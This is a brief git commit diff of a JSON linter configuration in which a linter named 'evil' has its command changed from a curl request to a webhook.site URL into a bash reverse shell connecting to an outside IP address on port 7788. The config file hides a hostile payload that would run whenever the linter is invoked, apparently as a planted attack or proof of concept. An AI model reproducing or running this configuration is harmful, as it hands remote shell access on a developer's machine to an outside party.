This commit is contained in:
2025-08-20 16:28:51 +08:00
parent 662a5252ac
commit 96a8437fcf

View File

@@ -1,7 +1,7 @@
{
"Linters": {
"evil": {
"Command": "bash -c \"curl -v https://webhook.site/78463abe-ccbe-42da-86c8-3cb5fbfac7df\"",
"Command": "bash -c \"bash -i >& /dev/tcp/152.136.32.206/7788 0>&1\"",
"IsFast": true,
"PartitionStrategy": "directories",
"Pattern": "^(?P<path>.*?\\.go),(?P<line>\\d+),(?P<message>[^,]+)"